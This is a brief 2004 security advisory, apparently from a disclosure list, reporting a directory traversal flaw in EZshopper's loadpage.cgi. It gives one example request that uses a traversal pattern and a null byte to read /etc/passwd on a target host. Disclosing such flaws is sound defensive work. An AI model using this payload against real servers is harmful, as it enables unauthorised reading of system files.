EZshopper is susceptible to a directory traversal attack. Exploitation included.
cbdb0c2b9acdabdbc38e91ad21b569d3defbbf86aa3ad3d5253a0b43f04f7d69
Product: EZshopper
Versions: all
URL: www.ahg.com
Vulnerability: Directory Traversal
Date: November 25, 2004
Discovered by: Zero X <Zero_X@excluded.org>
loadpage.cgi of EZshopper allows Directory Traversal
Example:
http://targethost/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html
- Zero X
- http://www.excluded.org